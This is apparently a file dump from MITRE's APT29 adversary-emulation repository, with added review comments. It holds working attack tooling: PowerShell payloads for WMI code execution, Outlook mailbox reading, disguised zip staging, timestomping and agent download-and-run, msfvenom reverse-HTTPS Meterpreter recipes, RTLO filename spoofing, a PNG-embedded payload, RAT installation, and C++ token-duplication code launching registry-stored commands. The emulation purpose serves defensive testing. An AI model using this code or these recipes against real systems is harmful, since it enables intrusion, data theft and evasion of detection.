$newClass.Properties.Add("Code", [System.Management.CimType]::String, $false) 10 | $newClass.Properties["Code"].Qualifiers.Add("key", $true) 11 | $newClass.Properties["Code"].Value = $wc 12 | $newClass.Properties.Add("Result", [System.Management.CimType]::String, $false) 13 | $newClass.Properties["Result"].Qualifiers.Add("Key", $true) 14 | $newClass.Properties["Result"].Value = "" 15 | $newClass.Put() 16 | Start-Sleep -s 5 17 | $p = [wmiclass]"\\.\root\cimv2:Win32_Process" 18 | $s = [wmiclass]"\\.\root\cimv2:Win32_ProcessStartup" 19 | $s.Properties['ShowWindow'].value=$false 20 | $code = ([wmiclass]"\\.\root\cimv2:Win32_AuditCode").Properties["Code"].value 21 | $p.Create("powershell.exe $code") 22 | $ps = Get-Process powershell | select starttime,id | Sort-Object -Property starttime | select -last 1 | select -expandproperty id 23 | Get-Process powershell | select starttime,id 24 | $ps 25 | Wait-Process -Id $ps 26 | $Text = Get-WmiObject -Class Win32_AuditCode -NameSpace "root\cimv2" | Select -ExpandProperty Result 27 | return $Text 28 | } 29 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepSeventeen_email.ps1: -------------------------------------------------------------------------------- 1 | function psemail { 2 | Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null 3 | $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type] 4 | $outlook = new-object -comobject outlook.application 5 | $namespace = $outlook.GetNameSpace("MAPI") 6 | $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox) 7 | $folder.items | Select-Object -Property Subject, ReceivedTime, SenderName, Body 8 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepSeventeen_zip.ps1: -------------------------------------------------------------------------------- 1 | function zip( 
$zipfilename, $sourcedir ) 2 | { 3 | Add-Type -Assembly System.IO.Compression.FileSystem 4 | $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal 5 | [System.IO.Compression.ZipFile]::CreateFromDirectory($sourcedir, $zipfilename, $compressionLevel, $false) 6 | Start-Sleep -s 3 7 | $fileContent = get-content $zipfilename 8 | $fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent) 9 | $fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes) 10 | $fileContentEncoded | set-content $zipfilename 11 | [Byte[]] $x = 0x47,0x49,0x46,0x38,0x39,0x61 12 | $save = get-content $zipfilename 13 | $x | set-content $zipfilename -Encoding Byte 14 | add-content $zipfilename $save 15 | } -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepThirteen.ps1: -------------------------------------------------------------------------------- 1 | function comp { 2 | $Signature=@" 3 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)] 4 | static extern bool GetComputerNameEx(COMPUTER_NAME_FORMAT NameType,string lpBuffer, ref uint lpnSize); 5 | enum COMPUTER_NAME_FORMAT 6 | {ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysicalDnsFullyQualified} 7 | public static string GCN() { 8 | bool success; 9 | string name = " "; 10 | uint size = 20; 11 | success = GetComputerNameEx(COMPUTER_NAME_FORMAT.ComputerNameNetBIOS, name, ref size); 12 | return "NetBIOSName:\t" + name.ToString(); 13 | } 14 | "@ 15 | Add-Type -MemberDefinition $Signature -Name GetCompNameEx -Namespace Kernel32 16 | $result = [Kernel32.GetCompNameEx]::GCN() 17 | return $result 18 | } 19 | function domain { 20 | $Signature=@" 21 | [DllImport("netapi32.dll", SetLastError=true)] 22 | public static extern int NetWkstaGetInfo(string 
servername, int level, out IntPtr bufptr);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WKSTA_INFO_100 {
public int platform_id;
public string computer_name;
public string lan_group;
public int ver_major;
public int ver_minor;
}
public static string NWGI()
{
string host = null;
IntPtr buffer;
var ret = NetWkstaGetInfo(host, 100, out buffer);
var strut_size = Marshal.SizeOf(typeof (WKSTA_INFO_100));
WKSTA_INFO_100 wksta_info;
wksta_info = (WKSTA_INFO_100) Marshal.PtrToStructure(buffer, typeof (WKSTA_INFO_100));
string domainName = wksta_info.lan_group;
return "DomainName:\t" + domainName.ToString();
}
"@
    # NOTE(review): the C# shim above ignores NetWkstaGetInfo's return code (`ret`),
    # never releases `buffer` (presumably NetApiBufferFree is expected), and leaves
    # `strut_size` unused; a failed call would marshal from a null pointer.
    Add-Type -MemberDefinition $Signature -Name NetWGetInfo -Namespace NetAPI32
    $result = [NetAPI32.NetWGetInfo]::NWGI()
    return $result
}
# user: returns "UserName:<tab><name>" via secur32!GetUserNameEx through an Add-Type
# P/Invoke shim; returns "" when the call reports failure.
# NOTE(review): the extern declares the output buffer as a plain `string`, which the
# marshaller does not copy back into managed memory, and passes userNameSize=40 for a
# one-character placeholder — the result is most likely the placeholder " " rather than
# the real name (a StringBuilder is the usual declaration). Also, value 2 in
# EXTENDED_NAME_FORMAT is NameSamCompatible; NameDisplay is 3, so the constant's name
# and its value disagree.
function user {
    $Signature=@"
[DllImport("secur32.dll", CharSet=CharSet.Auto, SetLastError=true)]
public static extern int GetUserNameEx (int nameFormat, string userName, ref int userNameSize);
public static string GUN() {
string uname = " ";
int size = 40;
int EXTENDED_NAME_FORMAT_NAME_DISPLAY = 2;
string ret = "";
if(0 != GetUserNameEx(EXTENDED_NAME_FORMAT_NAME_DISPLAY, uname, ref size))
{
ret += "UserName:\t" + uname.ToString();
}
return ret;
}
"@
    Add-Type -MemberDefinition $Signature -Name GetUNameEx -Namespace Secur32
    $result = [Secur32.GetUNameEx]::GUN()
    return $result
}
# pslist: returns one "<pid><tab><image name>" line per process, enumerated through a
# Toolhelp32 snapshot (0x00000002 = TH32CS_SNAPPROCESS) compiled in via Add-Type.
# NOTE(review): the snapshot handle is not checked for INVALID_HANDLE_VALUE before
# Process32First; on failure the function returns "" and still passes the invalid
# handle to CloseHandle.
function pslist {
    $Signature=@"
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
private struct PROCESSENTRY32
{
const int MAX_PATH = 260;
internal UInt32 dwSize;
internal UInt32 cntUsage;
internal UInt32 th32ProcessID;
internal IntPtr th32DefaultHeapID;
internal UInt32 th32ModuleID;
internal UInt32 cntThreads;
internal UInt32 th32ParentProcessID;
internal Int32 pcPriClassBase;
internal UInt32 dwFlags;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)]
internal string szExeFile;
}
[DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID);

[DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);

[DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);

[DllImport("kernel32", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CloseHandle([In] IntPtr hObject);

public static string CT32S() {
IntPtr hProcessSnap = CreateToolhelp32Snapshot(0x00000002, 0);
PROCESSENTRY32 procEntry = new PROCESSENTRY32();
procEntry.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32));
string ret = "";
if (Process32First(hProcessSnap, ref procEntry))
{
do
{
ret += (procEntry.th32ProcessID).ToString() + "\t" + (procEntry.szExeFile).ToString() + "\n";
} while (Process32Next(hProcessSnap, ref procEntry));
}
CloseHandle(hProcessSnap);
return ret;
}
"@
    Add-Type -MemberDefinition $Signature -Name CT32Snapshot -Namespace Kernel32
    $result = [Kernel32.CT32Snapshot]::CT32S()
    return $result
}
-------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepTwelve.ps1: --------------------------------------------------------------------------------
# detectav: returns one PSObject per AntiVirusProduct instance registered in the
# root\SecurityCenter2 WMI namespace (display name, instance GUID, signed product and
# reporting executable paths, timestamp). An empty array is returned when nothing is
# registered.
# NOTE(review): the SecurityCenter2 namespace is, as far as I know, present only on
# client editions of Windows — confirm before relying on this against a server.
function detectav {
    $AntiVirusProducts = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct

    $ret = @()
    foreach($AntiVirusProduct in $AntiVirusProducts){

        # Create a hash-table for each registered AV product
        $ht = @{}
        $ht.Name = $AntiVirusProduct.displayName
        $ht.'Product GUID' = $AntiVirusProduct.instanceGuid
        $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe
        $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe
        $ht.'Timestamp' = $AntiVirusProduct.timestamp


        # Wrap the hash-table in a PSObject so the caller gets named properties
        $ret += New-Object -TypeName PSObject -Property $ht
    }
    Return $ret
}
# software: lists installed products as "name | version | comments" lines, read from
# the 64-bit and WOW6432Node Uninstall keys under HKLM. The hive is opened with
# OpenRemoteBaseKey against the local computer name, so this is effectively a local read.
# NOTE(review): $a is not null-checked — if either Uninstall key is absent,
# GetSubKeyNames() is invoked on $null and the function throws; the RegistryKey objects
# opened here are never closed.
function software {
    $comp = $env:ComputerName
    $keys = "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall",
    "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    $type = [Microsoft.Win32.RegistryHive]::LocalMachine
    $regKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($type, $comp)
    $ret = ""
    foreach ($key in $keys) {
        $a = $regKey.OpenSubKey($key)
        $subkeyNames = $a.GetSubKeyNames()
        foreach($subkeyName in $subkeyNames) {
            $productKey = $a.OpenSubKey($subkeyName)
            $productName = $productKey.GetValue("DisplayName")
            $productVersion = $productKey.GetValue("DisplayVersion")
            $productComments = $productKey.GetValue("Comments")
            $out = $productName + " | " + $productVersion + " | " + $productComments + "`n"
            $ret += $out
        }
    }
    Return $ret
}
-------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1: --------------------------------------------------------------------------------
# timestomp: overwrites the creation, last-access and last-write times of $dest with
# those of a randomly chosen regular file under %windir%\system32 whose last-write time
# is before today, so that $dest no longer stands out by timestamp.
# NOTE(review): the Where-Object clause compares a DateTime with a date *string*;
# PowerShell coerces the string to a DateTime (midnight today) — confirm. Only the
# three timestamps exposed by System.IO.File are rewritten; metadata the API does not
# expose is untouched, which is a useful point of comparison when investigating.
function timestomp {
    [CmdletBinding()] param (
        [string] $dest
    )
    $source = (gci ((gci env:windir).Value + '\system32') | ? { !$_.PSIsContainer } | Where-Object { $_.LastWriteTime -lt $(get-date -format "MM/dd/yyyy") } | Get-Random | %{ $_.FullName })
    [IO.File]::SetCreationTime($dest, [IO.File]::GetCreationTime($source))
    [IO.File]::SetLastAccessTime($dest, [IO.File]::GetLastAccessTime($source))
    [IO.File]::SetLastWriteTime($dest, [IO.File]::GetLastWriteTime($source))
}

-------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/update.ps1: --------------------------------------------------------------------------------
# update: (re)starts the CALDERA sandcat agent. Stops any running sandcat.exe (and its
# parent process), then loops forever: if C:\Users\Public\sandcat.exe is missing it is
# downloaded from $server/file/download (request headers file=sandcat.go,
# platform=windows), then it is launched with -server $server -group diy_eval and the
# loop sleeps 60 s.
# NOTE(review): the downloaded binary is not verified (no hash or signature check) and
# the transport is whatever scheme $server carries; the agent is launched every 60 s
# regardless of whether the previous instance is still running; $SandcatPath and
# $output duplicate the same literal; Stop-Process $_.ParentProcessId stops whatever
# parent started sandcat.exe, which need not be a sandcat process.
function update
{
    Param(
        [Parameter(Mandatory=$true)][String]$server
    )
    $OldPids = Gwmi Win32_Process -Filter "Name='sandcat.exe'" | Select -Property ParentProcessId,ProcessId
    if ($OldPids)
    {
        echo "[*] sandcat.exe is running"
        ForEach-Object -InputObject $OldPids -Process { try { Stop-Process $_.ProcessId; Stop-Process $_.ParentProcessId } catch { "[!] could not kill sandcat.exe" }}
    }
    else
    {
        echo "[!] sandcat.exe is not running"
    }
    $SandcatPath = "C:\Users\Public\sandcat.exe"
    while($true)
    {
        if(!(Test-Path $SandcatPath))
        {
            $url="$server/file/download"
            $wc=New-Object System.Net.WebClient
            $wc.Headers.add("file","sandcat.go")
            $wc.Headers.add("platform","windows")
            $output="C:\Users\Public\sandcat.exe"
            $wc.DownloadFile($url,$output)
        }
        C:\Users\Public\sandcat.exe -server $server -group diy_eval
        sleep -Seconds 60
    }
}
-------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/upload.ps1: --------------------------------------------------------------------------------
#<#
# .SOURCE
# https://github.com/PowerShell/PowerShell/issues/2112#issuecomment-325133097
##>
# Invoke-MultipartFormDataUpload: POSTs $InFile as the multipart/form-data field
# "package" to $Uri with System.Net.Http.HttpClient and returns the HttpResponseMessage.
# The content type is $ContentType, else derived from the file name via
# System.Web.MimeMapping, else application/octet-stream. When $Credential is given,
# both handler credentials and an explicit Basic Authorization header are set.
# Throws a terminating error if $InFile is missing or the response is not a success
# status.
# NOTE(review): $packageFileStream is never disposed (only the client and the response
# are); `return $response` inside try runs before the finally block disposes that same
# object, so callers receive a disposed response; the `return $response` after
# ThrowTerminatingError is unreachable. Timeout = 18000000000 is presumably coerced to
# a TimeSpan in ticks (30 min) — confirm. The Basic header carries the plaintext
# password ISO-8859-1 encoded, so it is recoverable from any capture of a non-TLS
# request.
function Invoke-MultipartFormDataUpload
{
    [CmdletBinding()]
    PARAM
    (
        [string][parameter(Mandatory = $true)][ValidateNotNullOrEmpty()]$InFile,
        [string]$ContentType,
        [Uri][parameter(Mandatory = $true)][ValidateNotNullOrEmpty()]$Uri,
        [System.Management.Automation.PSCredential]$Credential
    )
    BEGIN
    {
        if (-not (Test-Path $InFile))
        {
            $errorMessage = ("File {0} missing or unable to read." -f $InFile)
            $exception = New-Object System.Exception $errorMessage
            $errorRecord = New-Object System.Management.Automation.ErrorRecord $exception, 'MultipartFormDataUpload', ([System.Management.Automation.ErrorCategory]::InvalidArgument), $InFile
            $PSCmdlet.ThrowTerminatingError($errorRecord)
        }

        if (-not $ContentType)
        {
            Add-Type -AssemblyName System.Web

            $mimeType = [System.Web.MimeMapping]::GetMimeMapping($InFile)

            if ($mimeType)
            {
                $ContentType = $mimeType
            }
            else
            {
                $ContentType = "application/octet-stream"
            }
        }
    }
    PROCESS
    {
        Add-Type -AssemblyName System.Net.Http

        $httpClientHandler = New-Object System.Net.Http.HttpClientHandler

        if ($Credential)
        {
            $networkCredential = New-Object System.Net.NetworkCredential @($Credential.UserName, $Credential.Password)
            $httpClientHandler.Credentials = $networkCredential
            $httpClientHandler.PreAuthenticate = $true
            $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler
            #$password = Get-PlainText -SecureString $Credential.Password
            # Explicit Basic header in addition to the handler credentials set above
            $Base64Auth = [System.Convert]::ToBase64String([System.Text.Encoding]::GetEncoding("iso-8859-1").GetBytes([String]::Format( "{0}:{1}", $Credential.UserName, $Credential.GetNetworkCredential().Password)))
            #$Base64Auth = [Convert]::ToBase64String([Text.Encoding]::GetEncoding("iso-8859-1").Getbytes("$($Credential.UserName):$($password)"))
            $httpClient.DefaultRequestHeaders.Add("Authorization", "Basic $Base64Auth")
        }
        else {
            $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler
        }

        $httpClient.Timeout = 18000000000
        #$httpClient.DefaultRequestHeaders.Add("AUTHORIZATION", "Basic YTph")

        $packageFileStream = New-Object System.IO.FileStream @($InFile, [System.IO.FileMode]::Open)

        $contentDispositionHeaderValue = New-Object System.Net.Http.Headers.ContentDispositionHeaderValue "form-data"
        $contentDispositionHeaderValue.Name = "package"
        $contentDispositionHeaderValue.FileName = (Split-Path $InFile -leaf)

        $streamContent = New-Object System.Net.Http.StreamContent $packageFileStream
        $streamContent.Headers.ContentDisposition = $contentDispositionHeaderValue
        $streamContent.Headers.ContentType = New-Object System.Net.Http.Headers.MediaTypeHeaderValue $ContentType

        $content = New-Object System.Net.Http.MultipartFormDataContent
        $content.Add($streamContent)

        try
        {
            $response = $httpClient.PostAsync($Uri, $content).Result

            if (!$response.IsSuccessStatusCode)
            {
                $responseBody = $response.Content.ReadAsStringAsync().Result
                $errorMessage = "Status code {0}. Reason {1}. Server reported the following message: {2}." -f $response.StatusCode, $response.ReasonPhrase, $responseBody

                throw [System.Net.Http.HttpRequestException] $errorMessage
            }

            #return $response.Content.ReadAsStringAsync().Result
            return $response

        }
        catch [Exception]
        {
            $PSCmdlet.ThrowTerminatingError($_)
            return $response
        }
        finally
        {
            if($null -ne $httpClient)
            {
                $httpClient.Dispose()
            }

            if($null -ne $response)
            {
                $response.Dispose()
            }
        }
    }
    END { }
}
-------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/payloads/‮cod.3aka.scr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/‮cod.3aka.scr.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/templates/evals.html:
-------------------------------------------------------------------------------- 1 | 2 | 3 |
4 |
5 |
6 | 9 |

About

10 |
11 | This CALDERA plugin is meant to emulate the techniques used by the MITRE ATT&CK team in ATT&CK evaluations.
12 | Multiple CALDERA adversary profiles have been developed for both APT3 and APT29.
13 | Consult the evals plugin's README.md for environment setup guidance. 14 | For general CALDERA questions, consult the CALDERA wiki. 15 |
16 |



-------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/APT29_EmuPlan.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/APT29_EmuPlan.pdf -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/APT29_Opflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/APT29_Opflow.png -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/install_day1_tools.sh: --------------------------------------------------------------------------------
# install_day1_tools.sh: provisions the Day 1 red-team host (apt-based distro):
# curl/git, the Pupy RAT via its own install.sh with the docker-compose port mapping
# rewritten 9000 -> 1234, and Metasploit via the rapid7 omnibus installer script.
# NOTE(review): there is no `set -e`; if the clone fails, `cd pupy` fails and every
# following command runs in the wrong directory. Both installers are fetched from the
# internet and executed with no checksum or signature verification, and the rewritten
# compose file passes through a fixed, predictable /tmp path.

# Install pre-reqs
sudo apt update -y
sudo apt install curl git -y

# Install Pupy RAT
git clone --recursive https://github.com/n1nj4sec/pupy.git
cd pupy
./install.sh
# Rewrite the compose port mapping via /tmp, then copy it back over the original
sed 's/9000:9000/1234:1234/g' pupy/conf/docker-compose.yml > /tmp/docker-compose.yml
cp /tmp/docker-compose.yml pupy/conf/docker-compose.yml

# Install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
-------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payload_configs.md: --------------------------------------------------------------------------------
### Create Day 1 Payloads


#### 1.
CosmicDuke Payload (cod.3aka3.scr) 5 | 6 | | Filename | Location | Description | 7 | | ------ | ------ | ------ | 8 | | cod.3aka3.scr | payloads/cod.3aka3.scr | Portable executable that uses right-to-left override character to disguise file extension | 9 | 10 | 11 | 1. Generate a Pupy-EC4 callback payload: 12 | 13 | ``` 14 | gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host :1234 15 | ``` 16 | 17 | 2. On Windows attack platform, rename cod.3aka3.scr with right-to-left override character (https://redcanary.com/blog/right-to-left-override/) 18 | 19 | 1. Windows key and type 'Character Map'; select open 20 | 2. Scroll to the RTLO character (U+202E) 21 | 3. Select the RTLO character, then click "select", then click "copy" 22 | 4. Right click `cod.3aka3.scr`, then click "Rename" 23 | 5. Move cursor to beginning of filename. Press "ctrl-v" to paste RTLO character, and hit "enter" to save the rename. 24 | 6. The file should now be named "rcs.3aka3.doc" 25 | 26 | ![alt text](https://mk0resourcesinfm536w.kinstacdn.com/wp-content/uploads/041515_2317_SpoofUsingR1.png) 27 | 28 | Screenshot taken from: https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/ 29 | 30 | 31 | #### 2. Privilege Escalation Payload (monkey.png) 32 | 33 | | Filename | Location | Description | 34 | | ------ | ------ | ------ | 35 | | monkey.png | payloads/monkey.png | Well formed PNG with embedded PowerShell-Meterpreter callback | 36 | 37 | Steps to re-create: 38 | 1. Generate a PowerShell-formatted Meterpreter payload: 39 | 40 | ``` 41 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --format psh -o meterpreter.ps1 42 | ``` 43 | 44 | 2. 
Transfer meterpreter.ps1 to Windows attack platform; embed meterpreter.ps1 into a PNG file using Invoke-PSImage (https://github.com/peewpw/Invoke-PSImage): 45 | 46 | ``` 47 | Import-Module .\Invoke-PSImage.ps1 48 | ``` 49 | 50 | ``` 51 | Invoke-PSImage -Script .\meterpreter.ps1 -Out .\monkey.png -Image .\monkey.jpg 52 | ``` 53 | 54 | #### 3. Startup Folder Payload (strings64/hostui.exe) 55 | 56 | | Filename | Location | Description | 57 | | ------ | ------ | ------ | 58 | | strings64.exe | payloads/SysinternalsSuite/strings64.exe | Launches Meterpreter using CreateProcessWithToken API call | 59 | 1. Generate PowerShell-formatted Meterpreter: 60 | 61 | ``` 62 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --format psh-cmd 63 | ``` 64 | 65 | 2. Copy the PowerShell 1-liner to clipboard. Your clipboard should look like: 66 | 67 | `powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa=` 68 | 69 | Do **not** copy the execution preamble (`%COMSPEC% /b /c start /b /min`) 70 | 71 | 3. Open `payloads/readme.txt`; paste the PowerShell-Meterpreter blob on line `816`. This line should look like: 72 | 73 | `$javasvc = "powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa="` 74 | 75 | #### 4. Persistent Service Payload (javamtsup.exe) 76 | 77 | | Filename | Location | Description | 78 | | ------ | ------ | ------ | 79 | | javamtsup.exe | payloads/SysinternalsSuite/javamtsup.exe | Reverse HTTPS Meterpreter service executable | 80 | 81 | 1. Generate a Meterpreter service-binary: 82 | 83 | ``` 84 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f exe-service -o javamtsup.exe 85 | ``` 86 | 87 | #### 5. SeaDuke Payload (python.exe) 88 | 89 | | Filename | Location | Description | 90 | | ------ | ------ | ------ | 91 | | python.exe | payloads/Seaduke/python.exe | Python Meterpreter compiled to EXE with PyInstaller | 92 | 93 | 1. 
Generate python-formatted Meterpreter: 94 | 95 | ``` 96 | msfvenom -p python/meterpreter/reverse_https LHOST= LPORT=8443 -o python.py 97 | ``` 98 | 99 | 2. Transfer python.py to Windows attack platform 100 | 101 | 3. Compile python.py into a portable executable using PyInstaller (https://pypi.org/project/PyInstaller/) 102 | 103 | ``` 104 | pyinstaller -F python.py 105 | ``` 106 | 107 | 4. Pack the python.exe payload using UPX (https://github.com/upx/upx) 108 | 109 | ``` 110 | upx --brute python.exe 111 | ``` 112 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/python.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/python.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/rar.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/rar.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/sdelete64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/Seaduke/sdelete64.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/hostui.txt: 
-------------------------------------------------------------------------------- 1 | powershell.exe -c "Start-Process C:\Windows\System32\hostui.exe -verb runas" -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/javamtsup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/javamtsup.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/strings64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/SysinternalsSuite/strings64.exe -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/cod.3aka3.scr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mitre-attack/attack-arsenal/201db70f403676cc8ec090035f17d98cf9995244/adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/cod.3aka3.scr -------------------------------------------------------------------------------- /adversary_emulation/APT29/Emulation_Plan/Day 1/payloads/hostui.cpp: -------------------------------------------------------------------------------- 1 | // hostui.cpp : This file contains the 'main' function. Program execution begins and ends there. 
//
// Reviewer summary: hostui.exe locates explorer.exe, duplicates its primary token and
// calls CreateProcessWithTokenW to start a hidden powershell.exe whose command line
// reads HKLM\SOFTWARE\Javasoft "value Supplement" and pipes it to Invoke-Expression.
// payload_configs.md (section 3) on this page files it under the startup-folder payload,
// and hostui.txt launches it with "Start-Process ... hostui.exe -verb runas".
// Observable behaviour for detection: a powershell.exe child of hostui.exe carrying
// Invoke-Expression in its command line, a read of HKLM\SOFTWARE\Javasoft, and a
// CreateProcessWithTokenW call from a non-service binary.

#include
#include
#include
#include
#include
#include
// NOTE(review): the six header names were lost in this rendering of the file.

DWORD FindProcessId(const std::wstring& processName);
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege); // declared but neither defined nor called in this file

// Entry point. Returns 0 after the CreateProcessWithTokenW attempt (its own result is
// not checked), 1 on any failure to reach explorer.exe's token.
int main()
{

    BOOL result;

    PROCESS_INFORMATION processInfo;
    STARTUPINFO StartupInfo;

    ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
    ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
    memset(&processInfo, 0x00, sizeof(PROCESS_INFORMATION)); // redundant: processInfo was zeroed on the line above
    StartupInfo.cb = sizeof(STARTUPINFO);

    std::string explorer_str("explorer.exe");
    std::wstring explorer_wstr(explorer_str.begin(), explorer_str.end()); // byte-wise widening; fine for this ASCII name

    DWORD explorerProcessId = FindProcessId(explorer_wstr); // Find the ProcessId of EXPLORER.EXE
    //printf("Explorer PID: %u\n", dwProcessId);
    // NOTE(review): a PID of 0 (explorer.exe not found) is not special-cased; OpenProcess on it fails below.

    HANDLE hExplorerProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, explorerProcessId); // get a handle to EXPLORER.EXE's process
    if (hExplorerProcess)
    {
        HANDLE hExplorerToken;
        result = OpenProcessToken(hExplorerProcess, TOKEN_DUPLICATE, &hExplorerToken); // get a handle to EXPLORER.EXE's token

        if (result)
        {
            HANDLE duplicatedExplorerToken;
            result = DuplicateTokenEx( // duplicate EXPLORER.EXE's token
                hExplorerToken,
                TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID,
                NULL,
                SecurityImpersonation,
                TokenPrimary,
                &duplicatedExplorerToken);

            if (result)
            {
                TCHAR szCommandLine[MAX_PATH];
                _tcscpy_s(szCommandLine, MAX_PATH, _T("powershell.exe -c \"Get-ItemPropertyValue 'HKLM:\\\\SOFTWARE\\Javasoft' 'value Supplement' | Invoke-Expression\"")); // read payload path from registry, pipe to IEX
                void* lpEnvironment = NULL; // unused: NULL is passed literally below

                result = CreateProcessWithTokenW( // start the payload using the duplicated process token
                    duplicatedExplorerToken,
                    LOGON_WITH_PROFILE,
                    NULL,
                    szCommandLine,
                    CREATE_NO_WINDOW | NORMAL_PRIORITY_CLASS,
                    NULL,
                    NULL,
                    &StartupInfo,
                    &processInfo);
                // NOTE(review): result is not examined, and processInfo.hProcess/hThread are never closed.
                CloseHandle(duplicatedExplorerToken);
            }
            else
            {
                // NOTE(review): %d with a DWORD; %lu would match. hExplorerToken and hExplorerProcess leak on this path (process exits right after).
                printf("[-] Failed to duplicate EXPLORER.EXE's token: %d\n", GetLastError());
                return 1;
            }
            CloseHandle(hExplorerToken);
